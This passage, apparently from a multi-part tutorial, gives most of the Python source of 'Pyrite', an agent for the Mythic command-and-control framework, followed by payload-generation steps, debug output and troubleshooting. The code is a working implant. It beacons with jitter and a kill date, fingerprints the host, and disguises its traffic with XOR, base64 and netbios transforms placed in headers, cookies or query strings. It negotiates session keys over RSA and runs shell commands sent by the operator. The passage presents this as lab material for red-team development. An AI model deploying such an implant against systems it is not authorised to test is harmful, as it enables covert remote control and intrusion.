        return unpadder.update(padded) + unpadder.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")


# ─────────────────────────────────────────────────────────────────────────────
# Transform Pipeline
# ─────────────────────────────────────────────────────────────────────────────

def apply_transforms(data: bytes, transforms: list) -> bytes:
    """
    Apply a list of transforms in order to data before sending.
    Each transform is {"action": "...", "value": "..."}.
    Available actions per the httpx README:
      base64, base64url, xor, prepend, append, netbios, netbiosu
    """
    for t in transforms:
        action = t.get("action", "")
        value  = t.get("value", "")
        if action == "base64":
            data = base64.b64encode(data)
        elif action == "base64url":
            # Keep '=' padding — the httpx Go container uses base64.URLEncoding
            # which requires padding. Stripping '=' causes "illegal base64 data"
            # errors when the encoded length is not a multiple of 4.
            data = base64.urlsafe_b64encode(data)
        elif action == "prepend":
            data = value.encode("utf-8") + data
        elif action == "append":
            data = data + value.encode("utf-8")
        elif action == "xor":
            key  = value.encode("utf-8")
            if key:  # an empty key would make i % len(key) divide by zero
                data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action == "netbios":
            result = b""
            for byte in data:
                result += bytes([ord('a') + (byte >> 4), ord('a') + (byte & 0xf)])
            data = result
        elif action == "netbiosu":
            result = b""
            for byte in data:
                result += bytes([ord('A') + (byte >> 4), ord('A') + (byte & 0xf)])
            data = result
    return data


def reverse_transforms(data: bytes, transforms: list) -> bytes:
    """
    Reverse a list of transforms in reverse order to decode a server response.
    """
    for t in reversed(transforms):
        action = t.get("action", "")
        value  = t.get("value", "")
        if action == "base64":
            data = base64.b64decode(data)
        elif action == "base64url":
            pad  = (4 - len(data) % 4) % 4
            data = base64.urlsafe_b64decode(data + b"=" * pad)
        elif action == "prepend":
            data = data[len(value.encode("utf-8")):]
        elif action == "append":
            # Guard against an empty value: data[:-0] would return b"".
            suffix = value.encode("utf-8")
            if suffix:
                data = data[:-len(suffix)]
        elif action == "xor":
            key  = value.encode("utf-8")
            data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action in ("netbios", "netbiosu"):
            result = b""
            base   = ord('a') if action == "netbios" else ord('A')
            for i in range(0, len(data), 2):
                high = data[i] - base
                low  = data[i + 1] - base
                result += bytes([(high << 4) | low])
            data = result
    return data


# ─────────────────────────────────────────────────────────────────────────────
# HTTP Transport
# ─────────────────────────────────────────────────────────────────────────────

def _place_message(method: str, url: str, encoded: bytes,
                   msg_loc: str, msg_name: str, extra_headers: dict) -> bytes:
    """
    Send the encoded message using the HTTP method, URL, and placement
    location specified in the profile config.
    Returns the raw response bytes.
    """
    headers = dict(extra_headers)

    if requests:
        if msg_loc == "body":
            if method == "GET":
                r = requests.get(url, data=encoded, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, data=encoded, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "query":
            # Build the URL manually to avoid requests URL-encoding the value.
            # requests' params= dict would encode '+' as '%2B', breaking base64
            # in the query string. Our encoded value is already URL-safe (the
            # profile should use base64url for query placement, not base64).
            sep      = "&" if "?" in url else "?"
            full_url = f"{url}{sep}{msg_name}={encoded.decode('utf-8')}"
            if method == "GET":
                r = requests.get(full_url, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(full_url, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "header":
            headers[msg_name] = encoded.decode("utf-8")
            if method == "GET":
                r = requests.get(url, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "cookie":
            cookies = {msg_name: encoded.decode("utf-8")}
            if method == "GET":
                r = requests.get(url, cookies=cookies, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, cookies=cookies, headers=headers,
                                  verify=False, timeout=30)
        else:
            raise ValueError(f"Unknown message location: {msg_loc}")

        return r.content

    else:
        # urllib fallback — body placement only
        # Fail loudly rather than silently sending a query/header/cookie
        # profile as a request body.
        if msg_loc != "body":
            raise ValueError(
                f"urllib fallback supports body placement only, got: {msg_loc}"
            )
        req = urllib.request.Request(
            url, data=encoded, headers=headers, method=method
        )
        with urllib.request.urlopen(req, timeout=30) as r:
            return r.read()


def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    """
    Full send/receive cycle. Encrypts with SESSION_KEY if established (post-EKE),
    falls back to AESPSK (staging phase), then plaintext.
    override_key allows staging to specify which key to use explicitly.
    """
    active_key = override_key or SESSION_KEY or AESPSK

    json_body = json.dumps(payload).encode("utf-8")

    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body

    raw  = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)

    if use_get:
        encoded  = apply_transforms(wire, GET_TRANSFORMS)
        url      = f"{BASE_URL}{random.choice(GET_URIS)}"
        method   = "GET"
        msg_loc, msg_name, hdrs = GET_MSG_LOC, GET_MSG_NAME, GET_HDRS
        s_xforms = GET_SERVER_TRANSFORMS
    else:
        encoded  = apply_transforms(wire, POST_TRANSFORMS)
        url      = f"{BASE_URL}{random.choice(POST_URIS)}"
        method   = "POST"
        msg_loc, msg_name, hdrs = POST_MSG_LOC, POST_MSG_NAME, POST_HDRS
        s_xforms = POST_SERVER_TRANSFORMS

    # ── DEBUG ─────────────────────────────────────────────────────────────────
    key_label = (
        f"EKE session  ({SESSION_KEY[:16]}...)" if SESSION_KEY and not override_key else
        f"override key ({override_key[:16]}...)" if override_key else
        f"static PSK   ({AESPSK[:16]}...)"      if AESPSK else
        "plaintext"
    )
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f"  action    : {payload.get('action', '?')}")
    print(f"  outer UUID: {uuid_str}")
    print(f"  key used  : {key_label}")
    print(f"  raw[:60]  : {raw[:60]}...")
    print(f"  wire[:60] : {wire[:60]}...")
    print(f"  encoded head (20): {encoded[:20]}")
    print(f"  encoded tail (20): {encoded[-20:]}", flush=True)
    # ── END DEBUG ─────────────────────────────────────────────────────────────

    raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, hdrs)
    decoded  = reverse_transforms(raw_resp, s_xforms)

    print(f"[DEBUG] INCOMING: {raw_resp[:60]}...", flush=True)

    unwrapped = base64.b64decode(decoded + b'====')
    resp_body = unwrapped[36:]

    if not resp_body:
        raise RuntimeError(
            f"Empty response body from {url} — check C2 container logs: "
            "sudo ./mythic-cli logs httpx"
        )

    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)

    return json.loads(resp_body)


# ─────────────────────────────────────────────────────────────────────────────
# Kill Date
# ─────────────────────────────────────────────────────────────────────────────

def check_kill_date() -> None:
    if not KILL_DATE_STR:
        return
    try:
        if datetime.date.today() >= datetime.date.fromisoformat(KILL_DATE_STR):
            os._exit(0)
    except ValueError:
        pass


# ─────────────────────────────────────────────────────────────────────────────
# EKE Staging + Checkin
# ─────────────────────────────────────────────────────────────────────────────

def get_ip() -> str:
    try:
        return socket.gethostbyname(socket.gethostname())
    except Exception:
        return "127.0.0.1"


def _gen_session_id(length: int = 20) -> str:
    import string
    chars = string.ascii_letters + string.digits
    return "".join(random.choice(chars) for _ in range(length))


def do_staging_rsa() -> tuple:
    """
    Perform RSA-based Encrypted Key Exchange with Mythic.

    Per the Mythic checkin docs:
      https://docs.mythic-c2.net/customizing/payload-type-development/
              create_tasking/agent-side-coding/initial-checkin
              #eke-by-generating-client-side-rsa-keys

    Phase 1 — Agent sends to Mythic (encrypted with static AESPSK):
      Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
              "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )

    Phase 1 — Mythic responds (encrypted with static AESPSK):
      Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
              "uuid":"<tempUUID>",
              "session_key":"<RSAPub(new_aes_key)>",
              "session_id":"<same 20char>"}) )

    RSA details from docs: 4096-bit, PKCS1_OAEP with SHA1.

    Returns (tempUUID, session_key_b64) for use in the subsequent checkin.
    Sets SESSION_KEY global.
    """
    global SESSION_KEY

    from Crypto.PublicKey import RSA
    from Crypto.Cipher import PKCS1_OAEP
    from Crypto.Hash import SHA1

    rsa_key     = RSA.generate(4096)
    pub_pem_b64 = base64.b64encode(
        rsa_key.publickey().export_key("PEM")
    ).decode("utf-8")
    session_id  = _gen_session_id(20)

    staging_msg = {
        "action":     "staging_rsa",
        "pub_key":    pub_pem_b64,
        "session_id": session_id,
    }

    # Send staging_rsa encrypted with static AESPSK using PAYLOAD_UUID
    response = send_message(PAYLOAD_UUID, staging_msg, use_get=False,
                            override_key=AESPSK)

    if response.get("action") != "staging_rsa":
        raise RuntimeError(f"Unexpected staging response: {response.get('action')}")
    if response.get("session_id") != session_id:
        raise RuntimeError("Session ID mismatch in staging response")

    temp_uuid       = response["uuid"]
    session_key_enc = base64.b64decode(response["session_key"])

    # Decrypt session key with our RSA private key
    # Per Mythic docs: PKCS1_OAEP with SHA1, 4096-bit
    cipher_rsa  = PKCS1_OAEP.new(rsa_key, hashAlgo=SHA1)
    session_key = cipher_rsa.decrypt(session_key_enc)
    SESSION_KEY = base64.b64encode(session_key).decode("utf-8")

    return temp_uuid, SESSION_KEY


def debug_startup() -> None:
    """
    Print stamped-in configuration at startup so the operator can immediately
    confirm what the builder produced — crypto mode, callback target, profile
    values — before any network activity happens.
    """
    print("\n" + "=" * 60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("=" * 60)
    print(f"  Callback:       {BASE_URL}")
    print(f"  Payload UUID:   {PAYLOAD_UUID}")
    print(f"  Interval:       {CALLBACK_INTERVAL}s  Jitter: {CALLBACK_JITTER}%")
    print(f"  Kill date:      {KILL_DATE_STR or '(none)'}")
    print()
    if AESPSK and USE_EKE:
        print(f"  AESPSK:         {AESPSK[:20]}...")
        print(f"  USE_EKE:        True")
        print(f"  Crypto mode:    EKE — staging_rsa exchange with AESPSK,")
        print(f"                  then per-session key negotiated via RSA")
    elif AESPSK:
        print(f"  AESPSK:         {AESPSK[:20]}...")
        print(f"  USE_EKE:        False")
        print(f"  Crypto mode:    Static PSK — AESPSK used directly for all traffic")
    else:
        print(f"  AESPSK:         (not set)")
        print(f"  USE_EKE:        False")
        print(f"  Crypto mode:    Plaintext — no encryption")
    print()
    print(f"  POST URIs:      {POST_URIS}")
    print(f"  POST location:  {POST_MSG_LOC}" + (f"  name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f"  POST xforms:    {[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f"  GET URIs:       {GET_URIS}")
    print(f"  GET location:   {GET_MSG_LOC}" + (f"  name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f"  GET xforms:     {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("=" * 60 + "\n", flush=True)


def do_checkin() -> str:
    """
    Perform the full checkin sequence and return the callbackUUID.

    Branches on USE_EKE and AESPSK — both stamped in at build time:
      USE_EKE=True  → staging_rsa exchange (AESPSK) → session key → checkin
      USE_EKE=False, AESPSK set → static PSK checkin directly with PAYLOAD_UUID
      USE_EKE=False, no AESPSK  → plaintext checkin with PAYLOAD_UUID

    All post-checkin messages use CALLBACK_UUID + SESSION_KEY (EKE),
    CALLBACK_UUID + AESPSK (static PSK), or CALLBACK_UUID plaintext.
    """
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))

    checkin_data = {
        "action":          "checkin",
        "ip":              get_ip(),
        "os":              platform.platform(),
        "user":            user,
        "host":            socket.gethostname(),
        "pid":             os.getpid(),
        "uuid":            PAYLOAD_UUID,
        "architecture":    arch,
        "domain":          "",
        "integrity_level": 2,
        "external_ip":     "",
        "encryption_key":  "",
        "decryption_key":  "",
    }

    if USE_EKE:
        print(f"[DEBUG] CHECKIN: EKE mode")
        print(f"[DEBUG]   Phase 1 — staging_rsa (key: AESPSK {AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG]   staging_rsa OK")
        print(f"[DEBUG]   tempUUID:    {temp_uuid}")
        print(f"[DEBUG]   SESSION_KEY: {session_key[:16]}... (negotiated at runtime, not in binary)")
        print(f"[DEBUG]   Phase 2 — checkin (outer UUID: tempUUID, key: SESSION_KEY)")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN: Static PSK mode (key: {AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print(f"[DEBUG] CHECKIN: Plaintext mode")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)

    if response.get("status") == "success":
        callback_uuid = response["id"]
        post_checkin_key = (
            "SESSION_KEY" if SESSION_KEY else
            "AESPSK"      if AESPSK else
            "plaintext"
        )
        print(f"[DEBUG] CHECKIN OK — callbackUUID: {callback_uuid}")
        print(f"[DEBUG]   All subsequent messages: {callback_uuid} + {post_checkin_key}", flush=True)
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")


# ─────────────────────────────────────────────────────────────────────────────
# Task Loop — Batched
# ─────────────────────────────────────────────────────────────────────────────

def queue_response(task_id: str, output: str,
                   completed: bool = True, status: str = "success") -> None:
    """
    Queue a task response to be sent on the next get_tasking call.

    Per the Mythic get_tasking docs, responses can be included directly
    in the get_tasking message rather than requiring a separate post_response,
    halving the number of round trips per sleep interval.
    """
    _pending_responses.append({
        "task_id":     task_id,
        "user_output": output,
        "completed":   completed,
        "status":      status,
    })


def queue_error(task_id: str, error_msg: str) -> None:
    # Per the post_response docs, status strings starting with "error:"
    # turn the status label red in the Mythic UI.
    queue_response(task_id, error_msg, completed=True,
                   status="error: " + error_msg)


def get_tasking() -> list:
    """
    Poll for all pending tasks and include any queued responses from the
    previous execution cycle in the same request.

    Per the Mythic get_tasking docs:
      tasking_size: -1  means return all pending tasks
      responses key     allows piggybacking results onto the tasking request
    """
    global _pending_responses

    msg = {
        "action":       "get_tasking",
        "tasking_size": -1,
    }

    if _pending_responses:
        msg["responses"] = _pending_responses
        _pending_responses = []

    # Use the GET verb for get_tasking if the profile defines a GET block
    # with different URIs than the POST block. Otherwise use POST.
    # Compares the GET_URIS / POST_URIS lists that send_message() draws from.
    use_get = bool(GET_URIS) and GET_URIS != POST_URIS and GET_URIS != ["/"]
    return send_message(CALLBACK_UUID, msg, use_get=use_get).get("tasks", [])


# ─────────────────────────────────────────────────────────────────────────────
# Command Dispatch
# ─────────────────────────────────────────────────────────────────────────────

# ##COMMAND_CODE_INSERT##

COMMAND_MAP = {
    "shell": execute_shell,
    "exit":  execute_exit,
}


def dispatch_task(task: dict) -> None:
    task_id    = task["id"]
    command    = task["command"]
    raw_params = task.get("parameters", "")

    # Per the Mythic get_tasking docs, parameters is always a JSON string
    try:
        parsed = json.loads(raw_params) if raw_params else {}
    except json.JSONDecodeError:
        queue_error(task_id, f"Failed to parse task parameters: {raw_params!r}")
        return

    handler = COMMAND_MAP.get(command)
    if handler is None:
        queue_error(task_id, f"Unknown command: {command}")
        return

    try:
        if command == "exit":
            queue_response(task_id, "Exiting.")
            # Flush queued responses before exiting — os._exit() is immediate
            if _pending_responses:
                send_message(CALLBACK_UUID, {
                    "action":    "post_response",
                    "responses": _pending_responses,
                }, use_get=False)
            handler()
        else:
            queue_response(task_id, handler(parsed.get("command", "")))
    except Exception:
        queue_error(task_id, traceback.format_exc())


# ─────────────────────────────────────────────────────────────────────────────
# Sleep with Jitter
# ─────────────────────────────────────────────────────────────────────────────

def sleep_with_jitter(base_seconds: int, jitter_pct: int) -> None:
    jitter_range = base_seconds * (jitter_pct / 100.0)
    actual = base_seconds + random.uniform(-jitter_range, jitter_range)
    time.sleep(max(actual, 0.5))


# ─────────────────────────────────────────────────────────────────────────────
# Main Loop
# ─────────────────────────────────────────────────────────────────────────────

def main():
    global CALLBACK_UUID

    debug_startup()
    check_kill_date()

    while True:
        try:
            CALLBACK_UUID = do_checkin()
            break
        except Exception as e:
            print(f"[ERROR] Checkin failed: {e}", flush=True)
            traceback.print_exc()
            time.sleep(CALLBACK_INTERVAL)

    while True:
        check_kill_date()
        try:
            tasks = get_tasking()
            for task in tasks:
                dispatch_task(task)
        except Exception as e:
            print(f"[ERROR] Task loop: {e}", flush=True)
        sleep_with_jitter(CALLBACK_INTERVAL, CALLBACK_JITTER)


if __name__ == "__main__":
    main()

7. Generating an httpx Payload

  1. Review pyrite_httpx.json and edit it if needed. The callback host and port are set in the UI fields (step 5), not in the file
  2. In Mythic UI → Payloads → Generate New Payload
  3. Select pyrite, then select httpx as the C2 profile
  4. Upload pyrite_httpx.json when prompted for the profile config. This is required: a missing or malformed file produces the error "Missing name for agent variation"
  5. Fill in callback host, port, interval, jitter, and killdate in the remaining UI fields

For lab use, keep the callback host as http://. Mythic-layer AES-256 encryption via mythic_encrypts = True protects message content regardless of whether transport TLS is used. Transport TLS requires the httpx server container to be configured with a certificate; refer to the httpx repository for that configuration.

8. Verifying the Changes

8.1 Debug Instrumentation

Add a debug_startup() call at the top of main() to print the stamped-in configuration before any network activity, so you can confirm what the builder produced:

def debug_startup() -> None:
    """Print stamped-in configuration so the operator can confirm what was built."""
    print("\n" + "="*60)
    print("[DEBUG] PYRITE STARTUP CONFIGURATION")
    print("="*60)
    print(f"  Callback:       {BASE_URL}")
    print(f"  Payload UUID:   {PAYLOAD_UUID}")
    print(f"  Kill date:      {KILL_DATE_STR or '(none)'}")
    print()
    print(f"  AESPSK set:     {'YES — ' + AESPSK[:16] + '...' if AESPSK else 'NO (plaintext mode)'}")
    print(f"  USE_EKE:        {USE_EKE}")
    if AESPSK and USE_EKE:
        print(f"  Crypto mode:    EKE — staging_rsa exchange, then per-session key")
    elif AESPSK:
        print(f"  Crypto mode:    Static PSK — AESPSK used for all traffic")
    else:
        print(f"  Crypto mode:    Plaintext — no encryption")
    print()
    print(f"  POST URIs:      {POST_URIS}")
    print(f"  POST msg loc:   {POST_MSG_LOC}" + (f" name={POST_MSG_NAME!r}" if POST_MSG_NAME else ""))
    print(f"  POST transforms:{[t['action'] for t in POST_TRANSFORMS] or '(none)'}")
    print(f"  GET URIs:       {GET_URIS}")
    print(f"  GET msg loc:    {GET_MSG_LOC}" + (f" name={GET_MSG_NAME!r}" if GET_MSG_NAME else ""))
    print(f"  GET transforms: {[t['action'] for t in GET_TRANSFORMS] or '(none)'}")
    print("="*60 + "\n")

Add a debug version of do_checkin that shows the EKE stages as they happen:

def do_checkin() -> str:
    arch = "x64" if sys.maxsize > 2**32 else "x86"
    try:
        user = os.getlogin()
    except Exception:
        user = os.environ.get("USER", os.environ.get("USERNAME", "unknown"))

    checkin_data = {
        "action":          "checkin",
        "ip":              get_ip(),
        "os":              platform.platform(),
        "user":            user,
        "host":            socket.gethostname(),
        "pid":             os.getpid(),
        "uuid":            PAYLOAD_UUID,
        "architecture":    arch,
        "domain":          "",
        "integrity_level": 2,
        "external_ip":     "",
        "encryption_key":  "",
        "decryption_key":  "",
    }

    if USE_EKE:
        print("[DEBUG] CHECKIN MODE: EKE")
        print(f"[DEBUG]   Step 1: staging_rsa exchange using static AESPSK ({AESPSK[:16]}...)")
        temp_uuid, session_key = do_staging_rsa()
        print(f"[DEBUG]   staging_rsa complete")
        print(f"[DEBUG]   tempUUID:    {temp_uuid}")
        print(f"[DEBUG]   SESSION_KEY: {session_key[:16]}... (negotiated, not in binary)")
        print(f"[DEBUG]   Step 2: checkin using tempUUID + SESSION_KEY")
        response = send_message(temp_uuid, checkin_data, use_get=False)
    elif AESPSK:
        print(f"[DEBUG] CHECKIN MODE: Static PSK ({AESPSK[:16]}...)")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)
    else:
        print("[DEBUG] CHECKIN MODE: Plaintext")
        response = send_message(PAYLOAD_UUID, checkin_data, use_get=False)

    if response.get("status") == "success":
        callback_uuid = response["id"]
        print(f"[DEBUG] CHECKIN SUCCESS")
        print(f"[DEBUG]   callbackUUID: {callback_uuid}")
        print(f"[DEBUG]   All subsequent messages will use this UUID"
              + (" + SESSION_KEY" if SESSION_KEY else " + AESPSK" if AESPSK else " (plaintext)"))
        return callback_uuid
    raise RuntimeError(f"Checkin failed: {response}")

And the debug send_message which shows the active key at each call:

def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    active_key = override_key or SESSION_KEY or AESPSK

    json_body = json.dumps(payload).encode("utf-8")

    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body

    raw  = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)

    if use_get:
        transforms        = GET_TRANSFORMS
        server_transforms = GET_SERVER_TRANSFORMS
        url               = f"{BASE_URL}{random.choice(GET_URIS)}"
        msg_loc           = GET_MSG_LOC
        msg_name          = GET_MSG_NAME
        headers           = GET_HDRS
        method            = "GET"
    else:
        transforms        = POST_TRANSFORMS
        server_transforms = POST_SERVER_TRANSFORMS
        url               = f"{BASE_URL}{random.choice(POST_URIS)}"
        msg_loc           = POST_MSG_LOC
        msg_name          = POST_MSG_NAME
        headers           = POST_HDRS
        method            = "POST"

    encoded = apply_transforms(wire, transforms)

    # ── DEBUG: print BEFORE sending — visible even if connection fails ────────
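    # Label the key actually in use (active_key). The staging call passes
    # override_key=AESPSK, so it is reported as the static PSK.
    key_label = (
        f"static PSK  ({AESPSK[:16]}...)"       if active_key and active_key == AESPSK else
        f"EKE session ({SESSION_KEY[:16]}...)"  if active_key and active_key == SESSION_KEY else
        f"override    ({override_key[:16]}...)" if override_key else
        "plaintext"
    )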
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f"  outer UUID            : {uuid_str}")
    print(f"  action                : {payload.get('action', '?')}")
    print(f"  key used              : {key_label}")
    print(f"  raw before transforms : {raw[:80]}...")
    print(f"  wire (base64)         : {wire[:80]}...")
    print(f"  after profile xforms  : {encoded[:80]}...")
    print(f"  encoded head (20)     : {encoded[:20]}")
    print(f"  encoded tail (20)     : {encoded[-20:]}")
    print(f"  placement             : {msg_loc}" + (f" name={msg_name!r}" if msg_name else ""))

    raw_resp  = _place_message(method, url, encoded, msg_loc, msg_name, headers)
    decoded   = reverse_transforms(raw_resp, server_transforms)
    unwrapped = base64.b64decode(decoded + b'====')

    print(f"\n[DEBUG] INCOMING")
    print(f"  raw server response   : {raw_resp[:80]}...")
    print(f"  after reverse xforms  : {decoded[:80]}...")
    print(f"  after base64 decode   : {unwrapped[:80]}...")
    if active_key:
        print(f"  body is               : encrypted (will decrypt with {key_label})")
    else:
        print(f"  body is               : plaintext JSON")
    # ── END DEBUG ─────────────────────────────────────────────────────────────

    resp_body = unwrapped[36:]
    if not resp_body:
        raise RuntimeError("Empty response — check: sudo ./mythic-cli logs httpx")
    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)
    return json.loads(resp_body)

Update main() to call debug_startup():

def main():
    global CALLBACK_UUID

    debug_startup()    # ← print config before any network activity
    check_kill_date()
    ...

Example startup output for EKE mode (aes256_hmac + encrypted_exchange_check = true):

============================================================
[DEBUG] PYRITE STARTUP CONFIGURATION
============================================================
  Callback:       http://127.0.0.1:82
  Payload UUID:   bb0936fc-b373-462e-8548-52c9cd3614d6
  Kill date:      2027-04-07

  AESPSK set:     YES — ppnuO/i7+EB2HVao...
  USE_EKE:        True
  Crypto mode:    EKE — staging_rsa exchange, then per-session key

  POST URIs:      ['/data']
  POST msg loc:   body
  POST transforms:['base64']
  GET URIs:       ['/']
  GET msg loc:    body
  GET transforms: ['base64']
============================================================

[DEBUG] CHECKIN MODE: EKE
[DEBUG]   Step 1: staging_rsa exchange using static AESPSK (ppnuO/i7+EB2HVao...)

[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
  outer UUID            : bb0936fc-b373-462e-8548-52c9cd3614d6
  action                : staging_rsa
  key used              : static PSK  (ppnuO/i7+EB2HVao...)
  raw before transforms : b'bb0936fc-...<binary IV+cipher+HMAC>'...
  wire (base64)         : b'YmIwOTM2ZmMt...'...
  after profile xforms  : b'YmIwOTM2ZmMt...'...
  placement             : body

[DEBUG] INCOMING
  ...
  body is               : encrypted (will decrypt with static PSK)

[DEBUG]   staging_rsa complete
[DEBUG]   tempUUID:    303365-29d8-4d4c-...
[DEBUG]   SESSION_KEY: Xgjq3vE9vduJliEd... (negotiated, not in binary)
[DEBUG]   Step 2: checkin using tempUUID + SESSION_KEY

[DEBUG] OUTGOING (POST http://127.0.0.1:82/data)
  outer UUID            : 303365-29d8-4d4c-...
  action                : checkin
  key used              : EKE session (Xgjq3vE9vduJliEd...)
  ...

[DEBUG] CHECKIN SUCCESS
  callbackUUID: 558b6c3-2a38-4dfe-...
  All subsequent messages will use this UUID + SESSION_KEY

Example startup output for static PSK (aes256_hmac + encrypted_exchange_check = false):

  AESPSK set:     YES — ppnuO/i7+EB2HVao...
  USE_EKE:        False
  Crypto mode:    Static PSK — AESPSK used for all traffic

[DEBUG] CHECKIN MODE: Static PSK (ppnuO/i7+EB2HVao...)
[DEBUG] CHECKIN SUCCESS
  callbackUUID: e02388c8-cee5-45db-...
  All subsequent messages will use this UUID + AESPSK

Example startup output for plaintext (none):

  AESPSK set:     NO (plaintext mode)
  USE_EKE:        False
  Crypto mode:    Plaintext — no encryption

[DEBUG] CHECKIN MODE: Plaintext
[DEBUG] CHECKIN SUCCESS
  callbackUUID: 9d22506b-2dd1-4aff-...
  All subsequent messages will use this UUID (plaintext)

8.2 mythic_encrypts = False

With mythic_encrypts = False, send_message skips the mythic_encrypt/mythic_decrypt calls entirely and sends plaintext JSON, the same as in Part 1. The httpx container forwards the bytes unchanged and Mythic processes them as plaintext. This requires the operator to select none for the AESPSK parameter; otherwise Mythic will try to decrypt the plaintext blob with the AES key and fail.

Using mythic_encrypts = False with custom crypto implemented in a translation container is covered in Part 3.

8.3 Functional Verification

Verify the profile is being honoured: With pyrite_httpx.json (body + base64), the agent should POST to /data. Change the profile to location: "query" with name: "filter", regenerate, and confirm the agent sends GET /...?filter=<encoded> instead. This confirms the builder is correctly reading and stamping the profile values.

Verify batched tasking: Queue three shell commands in the Mythic UI before the agent beacons. All three tasks should arrive in a single get_tasking response, and all three results should be piggybacked on the following beacon rather than sent in three separate round trips.
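To make the expected beacon concrete, here is a minimal sketch of the message the agent should build once three tasks have finished. It mirrors queue_response() and get_tasking() from the listing, but the pending list, the queue and build_get_tasking helpers, and the task IDs are stand-ins invented for this illustration.

```python
import json

pending = []  # stand-in for the agent's _pending_responses list


def queue(task_id: str, output: str) -> None:
    """Queue one finished task, using the same fields as queue_response()."""
    pending.append({"task_id": task_id, "user_output": output,
                    "completed": True, "status": "success"})


def build_get_tasking() -> dict:
    """Build one get_tasking message carrying every queued response."""
    msg = {"action": "get_tasking", "tasking_size": -1}
    if pending:
        msg["responses"] = list(pending)
    return msg


# Three tasks finished during the previous cycle (IDs are made up).
for tid in ("task-1", "task-2", "task-3"):
    queue(tid, f"output of {tid}")

beacon = build_get_tasking()
print(json.dumps(beacon, indent=2))
```

If the OUTGOING debug output for get_tasking shows a responses array with three entries, the piggybacking is working as intended.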

| Symptom | Likely cause |
| --- | --- |
| Profile generates but agent gets empty response | httpx container failed to load the profile config. Check sudo ./mythic-cli logs httpx for Failed to read file from Mythic. Restart with sudo ./mythic-cli restart httpx |
| HMAC verification failed on checkin | Almost always caused by empty response body. Fix the httpx container first |
| HTTP Error 404 on POST to /data | httpx container not running or profile config not loaded. Check logs and restart |
| Agent produces no output at all | Exception being swallowed. Ensure main() prints exceptions. Usually a missing pycryptodome or connection refused |
| Command files duplicated in generated agent | Builder insertion marker appeared twice in template. Ensure template uses # ##COMMAND_CODE_INSERT## exactly once |
| Port stamped as 80 despite specifying a different port | Domain regex failed to parse callback_domains. Add debug print of callback_domains raw value in builder Step 2 |
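For the port-parsing symptom, one option is to avoid a hand-written regex altogether. The sketch below is an assumption rather than the builder's actual code: parse_callback is a hypothetical helper, and it assumes callback_domains entries look like scheme://host:port, as in the Callback line of the startup output.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_callback(entry: str) -> tuple:
    """Split a callback entry into (scheme, host, port)."""
    # Entries without a scheme are treated as plain HTTP (an assumption).
    parts = urlsplit(entry if "://" in entry else f"http://{entry}")
    # Fall back to the scheme's default port only when none was given.
    port = parts.port or DEFAULT_PORTS.get(parts.scheme, 80)
    return parts.scheme, parts.hostname, port


for raw in ("http://127.0.0.1:82", "https://example.com", "10.0.0.5:8080"):
    print(repr(raw), "->", parse_callback(raw))
```

Printing the raw value next to the parsed tuple, as the loop does, is the same debugging step the table suggests for builder Step 2.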

9. Profile Compatibility and EKE

Complex Malleable Profiles

Our implementation handles the full transform pipeline (xor, base64, base64url, prepend, append, netbios, netbiosu) in both directions. A profile like the Xenon apiclient.json example (message in a query parameter, multiple XOR+base64+prepend/append transforms, multi-URI rotation) works correctly because:

  • The agent applies client.transforms on top of the Mythic base64 wire format before sending
  • The agent reverses server.transforms after receiving to unwrap the response
  • URIs are selected randomly from the uris array per request
  • Message location (body, query, header, cookie) is fully implemented in _place_message
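The apply-then-reverse behaviour can be checked locally without a server. The following is a reduced sketch covering only four of the actions; the chain, the XOR key, and the prepend/append values are invented for illustration and are not taken from apiclient.json. In a real exchange the httpx container reverses client.transforms and the agent reverses server.transforms; here both directions run in one process with the same chain.

```python
import base64


def xor(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (its own inverse)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def apply(data: bytes, transforms: list) -> bytes:
    """Apply transforms in order, as the sender does."""
    for t in transforms:
        action, value = t["action"], t.get("value", "").encode("utf-8")
        if action == "xor":
            data = xor(data, value)
        elif action == "base64url":
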